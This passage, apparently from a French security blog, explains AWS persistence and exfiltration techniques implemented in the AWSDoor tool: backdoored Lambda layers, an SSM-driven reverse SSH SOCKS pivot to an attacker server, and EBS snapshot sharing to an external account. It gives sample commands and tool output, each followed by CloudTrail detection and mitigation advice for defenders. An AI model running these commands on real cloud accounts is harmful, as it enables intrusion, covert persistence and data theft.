<li> Ajouter un code Python permettant soit d’exécuter du code arbitraire, soit d’extraire les identifiants temporaires de la Lambda</li>
<li> Exposer le répertoire de la Lambda sur Internet via un API Gateway ou une Lambda Function</li>
</ul>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">La figure suivante <strong>résume le déploiement de la persistance </strong>:</p>
<p> </p>
<figure id="attachment_27318" aria-describedby="caption-attachment-27318" style="width: 1370px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27318" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_11-FR-Persitence-on-AWS.docx-Word-234x191.png" alt="Déploiement de la persistance Lambda" width="1370" height="1118" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_11-FR-Persitence-on-AWS.docx-Word-234x191.png 234w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_11-FR-Persitence-on-AWS.docx-Word-48x39.png 48w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_11-FR-Persitence-on-AWS.docx-Word-768x627.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_11-FR-Persitence-on-AWS.docx-Word.png 1142w" sizes="auto, (max-width: 1370px) 100vw, 1370px" /><figcaption id="caption-attachment-27318" class="wp-caption-text"><em>Déploiement de la persistance Lambda</em></figcaption></figure>
<p> </p>
<h5><span style="text-decoration: underline;">Lambda layers</span></h5>
<p style="text-align: justify;">La technique de <strong>persistance Lambda décrite ci-dessus est efficace, mais elle présente un inconvénient majeur : le code malveillant est facile à repérer</strong>. Si quelqu’un modifie la logique métier principale de la fonction ou examine le code source lors d’une enquête, la porte dérobée sera probablement découverte et supprimée.</p>
<p style="text-align: justify;">Une approche plus subtile consiste à <strong>dissimuler la charge utile malveillante dans une Lambda layer</strong> plutôt que dans le code même de la fonction.</p>
<p style="text-align: justify;">Une Lambda layer est un moyen <strong>de distribuer des dépendances partagées telles que des bibliothèques ou des environnements d’exécution personnalisés</strong>. Au lieu d’intégrer ces éléments directement dans la fonction, on peut les téléverser séparément et les attacher à une ou plusieurs fonctions Lambda. Cela allège le package de déploiement et facilite la réutilisation du code entre différents projets. Les layers sont couramment utilisées pour inclure des outils comme requests ou les SDK AWS (boto3) dans plusieurs fonctions.</p>
<p style="text-align: justify;">Du point de vue d’AWS, <strong>la layer est attachée à la fonction, mais son contenu n’est pas affiché directement dans la console</strong>.</p>
<p style="text-align: justify;">Comme illustré dans la capture d’écran ci-dessous, AWS se contente d’indiquer la présence de la layer ; pour l’inspecter, un utilisateur doit se rendre manuellement dans le panneau Lambda Layers et la télécharger au format ZIP.</p>
<p> </p>
<p data-wp-editing="1"><img loading="lazy" decoding="async" class=" wp-image-27320 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_33-FR-Persitence-on-AWS.docx-Word-437x167.png" alt="Visibilité d'un layer sur un lambda" width="1170" height="447" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_33-FR-Persitence-on-AWS.docx-Word-437x167.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_33-FR-Persitence-on-AWS.docx-Word-71x27.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_33-FR-Persitence-on-AWS.docx-Word-768x294.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_33-FR-Persitence-on-AWS.docx-Word-1536x587.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_33-FR-Persitence-on-AWS.docx-Word.png 1611w" sizes="auto, (max-width: 1170px) 100vw, 1170px" /> <img loading="lazy" decoding="async" class=" wp-image-27322 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_41-FR-Persitence-on-AWS.docx-Word-437x44.png" alt="" width="1172" height="118" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_41-FR-Persitence-on-AWS.docx-Word-437x44.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_41-FR-Persitence-on-AWS.docx-Word-71x7.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_41-FR-Persitence-on-AWS.docx-Word-768x78.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_41-FR-Persitence-on-AWS.docx-Word-1536x155.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_41-FR-Persitence-on-AWS.docx-Word.png 1634w" sizes="auto, (max-width: 1172px) 100vw, 1172px" /></p>
<p> </p>
<p style="text-align: justify;"><strong>L’utilisation d’un layer est visible</strong> (mais peut facilement passer inaperçue), mais pour télécharger le code<strong>, l’utilisateur doit se rendre dans un panneau spécifique Lambda Layer</strong> et le télécharger (sans l’afficher) au format ZIP :</p>
<p> </p>
<p><img loading="lazy" decoding="async" class=" wp-image-27324 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_56-FR-Persitence-on-AWS.docx-Word-437x151.png" alt="Panneau spécifique lambda layer" width="1166" height="403" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_56-FR-Persitence-on-AWS.docx-Word-437x151.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_56-FR-Persitence-on-AWS.docx-Word-71x25.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_56-FR-Persitence-on-AWS.docx-Word-768x265.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_56-FR-Persitence-on-AWS.docx-Word-1536x531.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_36_56-FR-Persitence-on-AWS.docx-Word.png 1704w" sizes="auto, (max-width: 1166px) 100vw, 1166px" /></p>
<p> </p>
<p style="text-align: justify;"><strong>Ces étapes supplémentaires peuvent rendre les défenseurs moins enclins à examiner le contenu de la layer</strong> lors de la phase initiale de triage.</p>
<p style="text-align: justify;">Un attaquant peut exploiter cela en créant une couche contenant une version compromise d’une bibliothèque standard, telle que requests. En surchargeant une fonction interne avec un comportement malveillant, l’attaquant obtient une exécution de code à distance chaque fois que la fonction est utilisée.</p>
<p style="text-align: justify;">Par exemple, après avoir téléchargé le package requests avec pip :</p>
<p> </p>
<pre>pip install -t python requests<br /><br /></pre>
<p style="text-align: justify;">L’attaquant <strong>modifie la fonction get() afin d’exécuter des commandes arbitraires </strong>:</p>
<p> </p>
<figure id="attachment_27327" aria-describedby="caption-attachment-27327" style="width: 1228px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27327" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_16-FR-Persitence-on-AWS.docx-Word-287x191.png" alt="Injection dans la fonction requests.get" width="1228" height="817" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_16-FR-Persitence-on-AWS.docx-Word-287x191.png 287w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_16-FR-Persitence-on-AWS.docx-Word-59x39.png 59w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_16-FR-Persitence-on-AWS.docx-Word-768x512.png 768w" sizes="auto, (max-width: 1228px) 100vw, 1228px" /><figcaption id="caption-attachment-27327" class="wp-caption-text"><em>Injection dans la fonction requests.get</em></figcaption></figure>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">Ensuite, <strong>le package est compressé au format ZIP et déployé en tant que </strong><strong>layer</strong>, qui est attachée à la fonction cible :</p>
<p> </p>
<p><img loading="lazy" decoding="async" class="wp-image-27329 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_34-FR-Persitence-on-AWS.docx-Word-437x175.png" alt="Un layer est attaché à la fonction cible" width="654" height="262" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_34-FR-Persitence-on-AWS.docx-Word-437x175.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_34-FR-Persitence-on-AWS.docx-Word-71x28.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_34-FR-Persitence-on-AWS.docx-Word-768x307.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_34-FR-Persitence-on-AWS.docx-Word.png 1003w" sizes="auto, (max-width: 654px) 100vw, 654px" /></p>
<p> </p>
<p style="text-align: justify;">Enfin, <strong>le code source de la fonction Lambda est mis à jour pour utiliser la bibliothèque compromise</strong>, ce qui peut sembler inoffensif à première vue :</p>
<p> </p>
<p><img loading="lazy" decoding="async" class=" wp-image-27332 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_47-FR-Persitence-on-AWS.docx-Word-437x126.png" alt="La fonction Get injectée appelée dans du code" width="597" height="172" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_47-FR-Persitence-on-AWS.docx-Word-437x126.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_47-FR-Persitence-on-AWS.docx-Word-71x20.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_47-FR-Persitence-on-AWS.docx-Word-768x221.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_37_47-FR-Persitence-on-AWS.docx-Word.png 1235w" sizes="auto, (max-width: 597px) 100vw, 597px" /></p>
<p> </p>
<p style="text-align: justify;">Ce <strong>qui ressemble à une requête HTTP légitime est désormais un déclencheur pour un comportement malveillant caché</strong>. À moins que le défenseur n’inspecte le contenu réel de la couche attachée, cette porte dérobée peut rester indétectée.</p>
<p> </p>
<h5><span style="text-decoration: underline;">AWSDoor</span></h5>
<p>Cette technique est implémentée dans AWSDoor :</p>
<p> </p>
<pre>python .\main.py -m AdminLambda -r FAKEROLE -n lambda_test2 -l<br />[+] The following trust policy will be created :<br />{<br />  "Version": "2012-10-17",<br />  "Statement": [<br />    {<br />      "Effect": "Allow",<br />      "Principal": {<br />        "Service": "lambda.amazonaws.com"<br />      },<br />      "Action": "sts:AssumeRole"<br />  ]<br />}<br /><br />[+] Do you want to apply this change? (yes/no): yes<br />[+] Layer created<br />[+] Created lambda function lambda_test2<br />[+] Invoke URL : https://g4uqlkoakdr36m6agsxcho3idi0krwah.lambda-url.eu-west-3.on.aws/</pre>
<p> </p>
<p style="text-align: justify;">Quelques paramètres supplémentaires peuvent être utilisés :</p>
<ul style="text-align: justify;">
<li> <strong>-l : utiliser une couche Lambda</strong>, sinon inclure le code malveillant directement dans la Lambda</li>
<li> <strong>-g : utiliser une API Gateway</strong>, sinon utiliser une FunctionURL</li>
</ul>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"><strong>L’API Gateway est une méthode plus propre pour exposer une Lambda sur Internet </strong>; cependant, il est possible de repérer facilement qu’elle est accessible depuis Internet, car cela est affiché comme un déclencheur.</p>
<p> </p>
<p><img loading="lazy" decoding="async" class=" wp-image-27334 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_04-FR-Persitence-on-AWS.docx-Word-373x191.png" alt="L'APi Gateway est visible en tant que déclencheur" width="596" height="305" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_04-FR-Persitence-on-AWS.docx-Word-373x191.png 373w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_04-FR-Persitence-on-AWS.docx-Word-71x36.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_04-FR-Persitence-on-AWS.docx-Word-768x393.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_04-FR-Persitence-on-AWS.docx-Word.png 1372w" sizes="auto, (max-width: 596px) 100vw, 596px" /></p>
<p> </p>
<p style="text-align: justify;">La charge utile déployée par défaut prend un code Python passé en paramètre GET cmd, l’exécute, puis renvoie les données stockées dans la variable result:</p>
<p> </p>
<pre>curl ${invokeUrl}/cmd=`echo ‘result = “Hello World”’ | basenc --base64url` <br />&gt;&gt; {result: “Hello World”}</pre>
<p> </p>
<h5><span style="text-decoration: underline;">Défense</span></h5>
<p style="text-align: justify;">Du point de vue d’un défenseur, <strong>les Lambda </strong><strong>layers sont souvent négligées lors des réponses à incident</strong>, en particulier lorsque seul le code de la fonction est examiné. Comme les layers ne sont pas affichées en ligne dans la console Lambda et doivent être téléchargées manuellement sous forme d’archives ZIP, <strong>un contenu malveillant peut facilement passer inaperçu</strong>. Cela fait des layers un emplacement attractif pour les attaquants souhaitant dissimuler des portes dérobées ou des dépendances compromises.</p>
<p style="text-align: justify;">Les <strong>stratégies de détection et de mitigation suivantes peuvent aider les équipes de sécurité</strong> à identifier et à réagir à une utilisation suspecte des couches Lambda :</p>
<ul>
<li style="text-align: justify;"><strong> Auditer les attachements de Lambda layers</strong>: l’événement UpdateFunctionConfiguration est enregistré par CloudTrail qu’un nouveau layer est attachée à une fonction Lambda. Il est alors possible de suivre les changements inhabituels ou les associations entre des équipes ou projets sans lien.</li>
<li style="text-align: justify;"><strong> Restreindre la mise à jour des layers au flux CICD </strong>: empêcher toute modification de couche en dehors de la pipeline CICD, en établissant une liste blanche des rôles autorisés à le faire. Concentrer les efforts de détection et de chasse aux menaces sur les usages abusifs ou les mises à jour de ce rôle.</li>
<li style="text-align: justify;"><strong> Vérifier les Lambda exposées directement sur Internet :</strong> exposer une Lambda sur Internet peut être un signe de déploiement de persistance. Toute modification inhabituelle de configuration impliquant l’exposition d’une telle ressource sur Internet doit être investiguée.</li>
</ul>
<p> </p>
<figure id="attachment_27336" aria-describedby="caption-attachment-27336" style="width: 956px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27336" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_19-FR-Persitence-on-AWS.docx-Word-365x191.png" alt="Événement déclenché lors de la création d’un API Gateway" width="956" height="500" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_19-FR-Persitence-on-AWS.docx-Word-365x191.png 365w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_19-FR-Persitence-on-AWS.docx-Word-71x37.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_19-FR-Persitence-on-AWS.docx-Word-768x401.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_19-FR-Persitence-on-AWS.docx-Word.png 1395w" sizes="auto, (max-width: 956px) 100vw, 956px" /><figcaption id="caption-attachment-27336" class="wp-caption-text"><em>Événement déclenché lors de la création d’un API Gateway</em></figcaption></figure>
<p> </p>
<figure id="attachment_27338" aria-describedby="caption-attachment-27338" style="width: 998px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27338" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_37-FR-Persitence-on-AWS.docx-Word-398x191.png" alt="Événement déclenché lors de l’association d’une URL à une fonction Lambda" width="998" height="479" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_37-FR-Persitence-on-AWS.docx-Word-398x191.png 398w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_37-FR-Persitence-on-AWS.docx-Word-71x34.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_37-FR-Persitence-on-AWS.docx-Word-768x369.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_37-FR-Persitence-on-AWS.docx-Word-1536x738.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_37-FR-Persitence-on-AWS.docx-Word.png 1599w" sizes="auto, (max-width: 998px) 100vw, 998px" /><figcaption id="caption-attachment-27338" class="wp-caption-text"><em>Événement déclenché lors de l’association d’une URL à une fonction Lambda</em></figcaption></figure>
<p> </p>
<p style="text-align: justify;">Bien que les <strong>layers soient une fonctionnalité puissante et utile</strong>, elles constituent <strong>un angle mort dans de nombreuses configurations de </strong><strong>monitoring</strong> de la sécurité AWS.</p>
<p> </p>
<h4>EC2</h4>
<h5><span style="text-decoration: underline;">Socks</span></h5>
<p style="text-align: justify;">AWS Systems Manager (SSM) <strong>offre un moyen puissant et flexible de gérer et d’interagir avec des instances EC2</strong> sans nécessiter d’accès réseau direct tel que SSH ou RDP. Au cœur de son fonctionnement, SSM permet la gestion à distance en utilisant un agent installé sur l’instance, qui communique de manière sécurisée avec le service Systems Manager. Par ce canal, <strong>les administrateurs peuvent exécuter des commandes, lancer des scripts ou ouvrir des sessions shell interactives sur les instances</strong>, le tout sans les exposer à Internet public ni gérer de bastions d’accès.</p>
<p style="text-align: justify;">L’un des principaux avantages de SSM est <strong>la réduction de la surface d’attaque grâce à la limitation des services exposés</strong>. Comme la communication est initiée depuis l’instance elle-même, qui se connecte aux points de terminaison du service SSM, cette approche fonctionne même dans un environnement réseau sécurisé où l’accès entrant est restreint.</p>
<p style="text-align: justify;">D’un point de vue sécurité, <strong>bien que SSM réduise l’exposition, il introduit également de nouveaux risques</strong>. Par exemple, si un attaquant compromet une identité disposant des autorisations pour démarrer des sessions SSM ou envoyer des commandes, il peut obtenir une exécution de code à distance sur l’instance sans nécessiter de point d’appui réseau.</p>
<p style="text-align: justify;">Un attaquant ayant <strong>accès au compte AWS peut exploiter les capacités de SSM pour compromettre une instance EC2</strong> et l’utiliser comme pivot réseau. Une approche courante consiste à déployer un proxy SOCKS inversé via SSH. En utilisant SSM, l’attaquant peut exécuter des commandes sur l’instance EC2 pour y déployer une clé SSH, puis lancer une commande afin d’exposer le port SSH de l’EC2 vers son propre serveur :</p>
<p> </p>
<pre>ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -R 2222:127.0.0.1:22 jail@{attackerServer} -I ~/cloudinit.pem -N -f</pre>
<p> </p>
<p style="text-align: justify;">Ensuite, l’attaquant, depuis son serveur, peut ouvrir un proxy SOCKS via SSH à l’aide de la commande suivante :</p>
<p> </p>
<pre>ssh -D 4444 ssm-user@127.0.0.1:2222</pre>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">Cela lui permet de faire <strong>transiter du trafic à travers l’instance EC2 compromise</strong>, en l’utilisant comme point d’appui à l’intérieur du réseau.</p>
<p> </p>
<h5><strong><u>Exfiltration de snapshot</u></strong></h5>
<p style="text-align: justify;">Bien qu’elle ne constitue pas un mécanisme de persistance, <strong>l’exfiltration de snapshot est une technique puissante d’exfiltration de données</strong> dans les environnements AWS. Elle exploite la possibilité de partager des snapshots Elastic Block Store (EBS) entre différents comptes AWS. Bien que cette fonctionnalité soit conçue pour la sauvegarde ou la collaboration, elle peut être détournée pour exfiltrer massivement des données.</p>
<p style="text-align: justify;">Un attaquant <strong>disposant de permissions suffisantes dans un compte AWS compromis peut créer un snapshot d’un volume EBS</strong>, puis le partager avec un compte externe qu’il contrôle.</p>
<p> </p>
<figure id="attachment_27340" aria-describedby="caption-attachment-27340" style="width: 1032px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27340" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_57-FR-Persitence-on-AWS.docx-Word-320x191.png" alt="Snapshot partagée" width="1032" height="616" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_57-FR-Persitence-on-AWS.docx-Word-320x191.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_57-FR-Persitence-on-AWS.docx-Word-65x39.png 65w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_57-FR-Persitence-on-AWS.docx-Word-768x459.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_38_57-FR-Persitence-on-AWS.docx-Word.png 1186w" sizes="auto, (max-width: 1032px) 100vw, 1032px" /><figcaption id="caption-attachment-27340" class="wp-caption-text"><em>Snapshot partagée</em></figcaption></figure>
<p> </p>
<p style="text-align: justify;">Depuis ce compte AWS externe, <strong>le snapshot peut être monté, copié et inspecté</strong>, donnant à l’attaquant un accès complet aux données du disque sous-jacent sans jamais rien télécharger directement depuis l’environnement cible.</p>
<p style="text-align: justify;">Cette méthode est <strong>particulièrement dangereuse lorsqu’elle est appliquée à une infrastructure sensible</strong>. Par exemple, si un contrôleur de domaine est virtualisé dans AWS, un attaquant peut prendre un snapshot de son volume, <strong>le partager avec son propre compte AWS et en extraire des fichiers sensibles tels que ntds.dit</strong>.</p>
<p> </p>
<figure id="attachment_27342" aria-describedby="caption-attachment-27342" style="width: 1369px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27342" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_12-FR-Persitence-on-AWS.docx-Word-244x191.png" alt="Extraction de la NTDS.DIT en utilisant les Snapshot AWS" width="1369" height="1072" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_12-FR-Persitence-on-AWS.docx-Word-244x191.png 244w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_12-FR-Persitence-on-AWS.docx-Word-50x39.png 50w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_12-FR-Persitence-on-AWS.docx-Word-768x602.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_12-FR-Persitence-on-AWS.docx-Word.png 1018w" sizes="auto, (max-width: 1369px) 100vw, 1369px" /><figcaption id="caption-attachment-27342" class="wp-caption-text"><em>Extraction de la NTDS.DIT en utilisant les Snapshot AWS</em></figcaption></figure>
<p> </p>
<p style="text-align: justify;">Tout cela <strong>peut se produire sans qu’il soit nécessaire d’interagir avec l’instance via le réseau</strong>, en contournant ainsi tous les outils de sécurité déployés sur le réseau interne.</p>
<p style="text-align: justify;">Il s’agit d’une technique d’exfiltration de données à faible bruit mais à fort impact, qui détourne des fonctionnalités natives d’AWS et passe inaperçue si des contrôles spécifiques ne sont pas en place.</p>
<p> </p>
<h5><span style="text-decoration: underline;">AWSDoor</span></h5>
<p style="text-align: justify;">Ces <strong>deux techniques sont implémentées dans AWSDoor</strong>. Les commandes suivantes peuvent être utilisées pour exporter une instance EC2 spécifique :</p>
<p> </p>
<pre>python .\main.py -m EC2DiskExfiltration -i i-0021dfcf18a891b07 -a 503561426720   <br /> <br />[-] The following volumes will be snapshoted and shared with 503561426720:                                       <br />        - vol-09ce1bf602374a743<br />[+] Do you want to apply this change? (yes/no): yes<br />[-] Created snapshot snap-006e79ceddf11a103 for volume vol-09ce1bf602374a743<br />[+] Shared snapshot snap-006e79ceddf11a103 with account 503561426720<br /><br /></pre>
<p>De la même manière, l’action SSH SOCKS peut être automatisée :</p>
<pre>python .\main.py -m EC2Socks -name i-0021dfcf18a891b07 -key "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILm9CIAw/X84wK1F5yfHJ+Z80S8iJjPNRuOIZlo7lMbg" -remotekey ..\..\Downloads\EC2.pem -user ec2-user -socksport 4444 -sshuser admin -sshhost 13.38.79.236 --method systemd<br /><br />[+] Command sent with ID: abdaf34e-7750-47b5-88c5-05d3fc1e67da<br />[-] Waiting 10 seconds for execution<br />[+] Status: Success</pre>
<p> </p>
<h5 style="text-align: justify;"><span style="text-decoration: underline;">Détection</span></h5>
<p style="text-align: justify;">Pour la partie snapshot, <strong>CloudTrail enregistre plusieurs événements </strong>:</p>
<ul>
<li style="text-align: justify;"><strong>CreateSnapshot </strong>: enregistré lorsqu’un snapshot est créé. Il s’agit d’une opération courante dans la plupart des environnements disposant de politiques de sauvegarde, donc pas intrinsèquement suspecte. Cependant, il est facile pour des attaquants de se fondre dans le bruit en imitant l’activité de sauvegarde standard.</li>
<li style="text-align: justify;"><strong>ModifySnapshotAttribute </strong>: enregistré lorsque le snapshot est partagé. Bien que la modification d’un attribut de snapshot ne soit pas inhabituelle, une simple analyse du contenu montre que le snapshot a été partagé avec un compte distant :</li>
</ul>
<p> </p>
<figure id="attachment_27344" aria-describedby="caption-attachment-27344" style="width: 1369px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27344" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_30-FR-Persitence-on-AWS.docx-Word-186x191.png" alt="Evènement créé lors du partage d’une snapshot" width="1369" height="1406" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_30-FR-Persitence-on-AWS.docx-Word-186x191.png 186w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_30-FR-Persitence-on-AWS.docx-Word-38x39.png 38w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_30-FR-Persitence-on-AWS.docx-Word-768x790.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_30-FR-Persitence-on-AWS.docx-Word.png 927w" sizes="auto, (max-width: 1369px) 100vw, 1369px" /><figcaption id="caption-attachment-27344" class="wp-caption-text"><em>Evènement créé lors du partage d’une snapshot</em></figcaption></figure>
<p> </p>
<p style="text-align: justify;">Il est donc possible de limiter ce type d’exploitation en surveillant l’événement ModifySnapshotAttribute et en s’assurant que la valeur de userId se situe dans la plage des comptes liés à l’organisation.</p>
<p style="text-align: justify;">De même, une méthode relevant de la « sécurité par l’obscurité » consisterait à ajouter des balises spécifiques lorsque des snapshots sont effectués à des fins de sauvegarde, <strong>puis à déclencher une alerte lorsqu’un snapshot est créé sans la balise appropriée</strong>. La balise pourrait, par exemple, être un hachage de l’heure de création, dérivé d’un secret connu uniquement de l’outil de sauvegarde.</p>
<p> </p>
<pre>BackupTag=HMAC(creation_time, secret)</pre>
<p> </p>
<p style="text-align: justify;">Pour l’exploitation en reverse SOCKS, <strong>cela dépend de la manière dont l’accès SSM est effectué :</strong></p>
<ul>
<li style="text-align: justify;"><strong>Depuis la console AWS (GUI) </strong>: un événement StartSession est enregistré dans CloudTrail lorsque l’attaquant démarre la connexion distante vers la machine. Le journal contient l’adresse IP de l’attaquant ainsi que l’identifiant EC2 ciblé.</li>
</ul>
<p> </p>
<figure id="attachment_27346" aria-describedby="caption-attachment-27346" style="width: 437px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="size-medium wp-image-27346" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_46-FR-Persitence-on-AWS.docx-Word-437x145.png" alt="Événement déclenché lors d’une connexion SSM" width="437" height="145" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_46-FR-Persitence-on-AWS.docx-Word-437x145.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_46-FR-Persitence-on-AWS.docx-Word-71x23.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_46-FR-Persitence-on-AWS.docx-Word-768x254.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_46-FR-Persitence-on-AWS.docx-Word.png 1291w" sizes="auto, (max-width: 437px) 100vw, 437px" /><figcaption id="caption-attachment-27346" class="wp-caption-text"><em>Événement déclenché lors d’une connexion SSM</em></figcaption></figure>
<p> </p>
<ul>
<li style="text-align: justify;"><strong>Depuis l’AWS CLI ou AWSDoor </strong>: l’événement StartSession n’est pas généré, mais c’est GetCommandInvocation qui est enregistré à la place.</li>
</ul>
<p> </p>
<figure id="attachment_27348" aria-describedby="caption-attachment-27348" style="width: 960px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27348" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_59-FR-Persitence-on-AWS.docx-Word-437x168.png" alt="Événement déclenché lors de l’invocation d’une commande SSM" width="960" height="369" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_59-FR-Persitence-on-AWS.docx-Word-437x168.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_59-FR-Persitence-on-AWS.docx-Word-71x27.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_59-FR-Persitence-on-AWS.docx-Word-768x295.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_39_59-FR-Persitence-on-AWS.docx-Word.png 1264w" sizes="auto, (max-width: 960px) 100vw, 960px" /><figcaption id="caption-attachment-27348" class="wp-caption-text"><em>Événement déclenché lors de l’invocation d’une commande SSM</em></figcaption></figure>
<p> </p>
<p style="text-align: justify;">Cependant, quelle que soit la technique utilisée, CloudTrail ne journalise pas la ligne de commande complète envoyée. Il reste donc pertinent et important d’ajouter une solution EDR directement sur les ressources.</p>
<p> </p>
<h2>Altération des défenses</h2>
